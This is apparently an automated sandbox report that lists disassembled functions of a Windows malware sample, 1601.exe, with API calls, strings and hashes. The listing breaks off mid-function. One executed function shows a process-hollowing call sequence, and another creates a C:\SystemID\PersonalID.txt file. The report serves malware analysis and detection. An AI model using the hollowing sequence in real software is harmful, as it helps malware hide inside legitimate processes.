Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
String ID: %username%$I:\5d2860c89d774.jpg
API String ID: 441990211-897913220
Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96

Uniqueness

Uniqueness Score: -1.00%

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777
unknown, xrefs: 0045175D

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Uniqueness

Uniqueness Score: -1.00%

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Uniqueness

Uniqueness Score: -1.00%

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
_fputws.LIBCMT ref: 0040C9C6
_fputws.LIBCMT ref: 0040C9E8
_fputws.LIBCMT ref: 0040C9F3

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _fputws$CreateDirectory
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2590308727-54166481
Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA

Uniqueness

Uniqueness Score: -1.00%

Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00420DD5
__calloc_crt.LIBCMT ref: 00420DEE

Strings

Assertion failed: %s, file %s, line %d, xrefs: 00420E13

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: __calloc_crt
String ID: Assertion failed: %s, file %s, line %d
API String ID: 3494438863-969893948
Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699

Uniqueness

Uniqueness Score: -1.00%

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
.\crypto\evp\digest.c, xrefs: 00480638

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Uniqueness

Uniqueness Score: -1.00%

Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0044F251

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F266

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

TeM, xrefs: 0044F25B, 0044F247

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: TeM
API String ID: 757275642-2215902641
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1601.exePID: 7472, Parent PID: 1040COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	39
Total number of Limit Nodes:	8

Executed Functions

Function 048E0110 Relevance: 21.2, APIs: 14, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 048E0156
CreateProcessA.KERNELBASE(?,00000000), ref: 048E0255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 048E0270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 048E0283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 048E029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 048E02C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 048E02E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 048E0304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 048E032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 048E0399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 048E03BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 048E03E1
ResumeThread.KERNELBASE(00000000), ref: 048E03ED
ExitProcess.KERNEL32(00000000), ref: 048E0412

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFreeReadResumeSectionUnmapView
String ID:
API String ID: 3993611425-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: ab51ee4b7339e0331300dfb7de4626e48c3b2dc07a68e3b07bb9e3f0fe548cc7
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: A7B1C874A00208AFDB44CF98C895FAEBBB5FF88314F248158E549AB395D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 048E0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 048E0533

Strings

saodkfnosa9uin, xrefs: 048E04DA
mfoaskdfnoa, xrefs: 048E0520, 048E0523
d, xrefs: 048E0584
0, xrefs: 048E0492

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 87a45526af6ad4d6a330418629c301e097a97a5854525c778eedffdc0b5a22c5
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 32511A70D08388DAEB11CBD8C849BEDBFB26F12708F144558D5447F286C3FA6658CB66

Uniqueness

Uniqueness Score: -1.00%

Function 048E05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 048E05EC

Strings

o, xrefs: 048E0600
apfHQ, xrefs: 048E05E2, 048E05E5

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: f1f6816be3a57698840e0dcc9d2e8e31e224c449358d6a5f430e609381d67aac
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 5D011E70C0425CEADB11DBD8C5183AEBFB5AF42309F148999C4097B252D7B69B58CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02E897C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E897EE
Module32First.KERNEL32(00000000,00000224), ref: 02E8980E

Memory Dump Source

Source File: 0000000D.00000002.1771122614.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E89000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e89000_1601.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: cc51aec1068ef08db49bf8f47066f594adc766d5346b69cb5006bf612d6eee96
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: A0F09632A407116FD7203FF5AC8DB7E76E8AF89729F105628F68E911C1DB70E8454A61

Uniqueness

Uniqueness Score: -1.00%

Function 02E89485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E894D6

Memory Dump Source

Source File: 0000000D.00000002.1771122614.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E89000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e89000_1601.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 3d86809878ce3cda6815a6014b9169a616bac9f1bdab3044d360fbbe03c5f5b0
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: D5112B79A40208EFDB01DF98C985E99BBF5AF08350F058094F9889B362D375EA90DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04906437 Relevance: 18.1, APIs: 12, Instructions: 84
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__calloc_crt.LIBCMT ref: 0490644E

Part of subcall function 04909636: __calloc_impl.LIBCMT ref: 04909645

__calloc_crt.LIBCMT ref: 04906472
_free.LIBCMT ref: 04906480
__calloc_crt.LIBCMT ref: 0490648E
_free.LIBCMT ref: 0490649E
_free.LIBCMT ref: 049064A4
__copytlocinfo_nolock.LIBCMT ref: 049064B3
__setmbcp_nolock.LIBCMT ref: 049064D4
_free.LIBCMT ref: 049064E2
___removelocaleref.LIBCMT ref: 049064E9
___freetlocinfo.LIBCMT ref: 049064F0
_free.LIBCMT ref: 049064F6

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 7caab2a72da200468eb9fe8f9142da887a9a984df953438cc1e58831cbd9c210
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: FC21AE32204600AEFB217F65DC02E0B7BE9DF81B68B50C43AF485590E0EB22FD60DA51

Uniqueness

Uniqueness Score: -1.00%

Function 04903F16 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 04903F51

Part of subcall function 04905BA8: __getptd_noexit.LIBCMT ref: 04905BA8

__gmtime64_s.LIBCMT ref: 04903FEA
__gmtime64_s.LIBCMT ref: 04904020
__gmtime64_s.LIBCMT ref: 0490403D
__allrem.LIBCMT ref: 04904093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049040AF
__allrem.LIBCMT ref: 049040C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049040E4
__allrem.LIBCMT ref: 049040FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04904119
__invoke_watson.LIBCMT ref: 0490418A

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: 8ff2a6bfc35a67f1cb3b59b52672c85eadc93ea4ced7a1e5c6d125ff436f889c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: BB71D771A40716AFF7249E69CC41B6AB3B9AF50768F14C639FA14E66C0E770F9408B90

Uniqueness

Uniqueness Score: -1.00%

Function 0490650E Relevance: 16.6, APIs: 11, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__invoke_watson.LIBCMT ref: 04906547
__calloc_crt.LIBCMT ref: 04906598
__lock.LIBCMT ref: 049065AE
__copytlocinfo_nolock.LIBCMT ref: 049065BF
_wcscmp.LIBCMT ref: 049065F9
__lock.LIBCMT ref: 04906610
__updatetlocinfoEx_nolock.LIBCMT ref: 04906622
___removelocaleref.LIBCMT ref: 04906628
__updatetlocinfoEx_nolock.LIBCMT ref: 04906647

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 67e581905e2071e427323193c4d873c00742e260509e3d3afaf9818b54528f8c
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: 79412632904308AFFB00AFA4DD4079E3BE9AF84328F10C43DEA14561D1DB75BA54DB51

Uniqueness

Uniqueness Score: -1.00%

Function 049084AB Relevance: 16.6, APIs: 11, Instructions: 92
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 049084B1
_free.LIBCMT ref: 049084E2
_free.LIBCMT ref: 049084F5
_free.LIBCMT ref: 04908513
_free.LIBCMT ref: 04908525
_free.LIBCMT ref: 04908536
_free.LIBCMT ref: 04908541
_free.LIBCMT ref: 04908565
_free.LIBCMT ref: 04908581
_free.LIBCMT ref: 04908597
_free.LIBCMT ref: 049085BF

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: e5ee81f27035f2b40b277a3f11045c3c13ff5b1db7fa4515e294427329927695
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: 9E318432A00250DFDB21AF54FC8584977B8FB54724704C67AE9056B2E0CBB5F9C9AF94

Uniqueness

Uniqueness Score: -1.00%

Function 0492FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0492FC1F

Part of subcall function 0491169C: std::exception::_Copy_str.LIBCMT ref: 049116B5

__CxxThrowException@8.LIBCMT ref: 0492FC34
std::exception::exception.LIBCMT ref: 0492FC4D
__CxxThrowException@8.LIBCMT ref: 0492FC62
std::regex_error::regex_error.LIBCPMT ref: 0492FC74

Part of subcall function 0492F914: std::exception::exception.LIBCMT ref: 0492F92E

__CxxThrowException@8.LIBCMT ref: 0492FC82
std::exception::exception.LIBCMT ref: 0492FC9B
__CxxThrowException@8.LIBCMT ref: 0492FCB0

Strings

leM, xrefs: 0492FCA8

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
String ID: leM
API String ID: 3569886845-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: dba99522a453768f88d6b16e9f7cc27e9785f3769ae27017e2914817e3749cdf
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: EF11BC79C0020DBBCF00FFA5D455CDEBB7CAA44344B408566AD1497655EB74B7488B94

Uniqueness

Uniqueness Score: -1.00%

Function 048EF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 048EF01F

Part of subcall function 04901602: __FF_MSGBANNER.LIBCMT ref: 04901619
Part of subcall function 04901602: __NMSG_WRITE.LIBCMT ref: 04901620

_malloc.LIBCMT ref: 048EF02B
_wprintf.LIBCMT ref: 048EF03E
_free.LIBCMT ref: 048EF044
_free.LIBCMT ref: 048EF065
_malloc.LIBCMT ref: 048EF06D
_sprintf.LIBCMT ref: 048EF0C0
_wprintf.LIBCMT ref: 048EF0D2
_wprintf.LIBCMT ref: 048EF0DC
_free.LIBCMT ref: 048EF0E5

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: 871ddd1d2acee1ff5915bcbd7ee8bb4fb6e557cce93ccae7072984f8335c82a0
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: 3311F3B65005503EE26176B55C16EFF3BEC9F86315F0441BAFB48E11C0DA196A0493B1

Uniqueness

Uniqueness Score: -1.00%

Function 048F1960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 048F19C6
__CxxThrowException@8.LIBCMT ref: 048F19F1
__CxxThrowException@8.LIBCMT ref: 048F1A1A
__CxxThrowException@8.LIBCMT ref: 048F1A4B
_memset.LIBCMT ref: 048F1A6A
__CxxThrowException@8.LIBCMT ref: 048F1A90
_malloc.LIBCMT ref: 048F1AA0
_memset.LIBCMT ref: 048F1AAB
_sprintf.LIBCMT ref: 048F1ACE

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: bbafb9f4e0154b783bc9868e93c21b00b50d058005bba4f557b41dfe43a7cb52
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 54514A71D40209EAEB11DBA5DC86FAFBBB8FB44704F104125FA05F6190E7746A018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 048EF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 048EF284
__CxxThrowException@8.LIBCMT ref: 048EF2AF
__CxxThrowException@8.LIBCMT ref: 048EF2DE
__CxxThrowException@8.LIBCMT ref: 048EF30F
_memset.LIBCMT ref: 048EF32E
__CxxThrowException@8.LIBCMT ref: 048EF354
_sprintf.LIBCMT ref: 048EF373

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 50d3e82e773090e582b708892bf70a28512c556cf9bcfdf5721e52ed43849056
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 40519FB1E40209BAEF11DFA5DC46FFEBB78AB45704F104525FA01F6180E775AA058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 048EF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 048EF4B7
__CxxThrowException@8.LIBCMT ref: 048EF4E2
__CxxThrowException@8.LIBCMT ref: 048EF504
